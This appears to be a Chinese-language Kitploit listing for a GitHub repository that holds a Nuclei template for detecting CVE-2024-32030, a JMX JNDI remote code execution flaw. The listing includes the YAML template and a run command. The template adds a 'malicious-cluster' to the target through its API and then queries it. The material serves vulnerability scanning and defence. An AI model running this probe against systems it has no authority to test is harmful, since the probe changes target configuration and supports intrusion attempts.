Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/huseyinstif/cve-2024-32030-nuclei-template
漏洞扫描器漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubhuseyinstif/cve-2024-32030-nuclei-template

CVE-2024-32030-Nuclei-Template

用于检测 CVE-2024-32030 JMX JNDI 远程代码执行漏洞的 Nuclei 模板,该漏洞通过恶意服务器连接触发。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
112年前尚未审核
分享

CVE-2024-32030 Nuclei 模板

描述

此仓库包含一个用于检测 CVE-2024-32030 漏洞的 Nuclei 模板。该漏洞允许通过 JMX 指标收集 JNDI 解析实现远程代码执行。

漏洞详情

  • ID: CVE-2024-32030
  • 名称: JMX Metrics Collection JNDI 远程代码执行
  • 作者: Hüseyin TINTAŞ
  • 严重性: 严重
  • 描述: 该模板通过尝试连接到恶意的 JMX 服务器来检查漏洞是否存在。
  • 标签: cve, cve2024, jmx, rce, cve2024-32030

模板

root@kitploit:~
id: CVE-2024-32030

info:
  name: CVE-2024-32030 JMX Metrics Collection JNDI RCE
  author: Hüseyin TINTAŞ
  severity: critical
  description: >
    CVE-2024-32030 JMX Metrics Collection JNDI Resolution Remote Code Execution Vulnerability.
    This template checks for the presence of the vulnerability by attempting to connect to a malicious JMX server.
  tags: cve, cve2024, jmx, rce, cve2024-32030

requests:
  - method: POST
    path:
      - "{{BaseURL}}/api/clusters"
    headers:
      Content-Type: "application/json"
    body: |
      {
        "name": "malicious-cluster",
        "bootstrapServers": ["127.0.0.1:1718"],
        "metrics": {
          "type": "JMX",
          "port": 1718
        }
      }
    matchers:
      - type: word
        part: body
        words:
          - "malicious-cluster added successfully"

  - method: GET
    path:
      - "{{BaseURL}}/api/clusters/malicious-cluster"
    matchers:
      - type: word
        part: body
        words:
          - "malicious-cluster"

  - method: GET
    path:
      - "{{BaseURL}}/api/clusters/malicious-cluster/metrics"
    matchers:
      - type: word
        part: body
        words:
          - "metrics"

用法

要使用此模板,请将其保存为 cve-2024-32030.yaml,然后使用 Nuclei 运行:

root@kitploit:~
nuclei -t CVE-2024-32030.yaml -u http://target-server

联系方式

如有任何疑问或需要更多信息,您可以通过以下方式联系我:

  • LinkedIn
  • Twitter
下载工具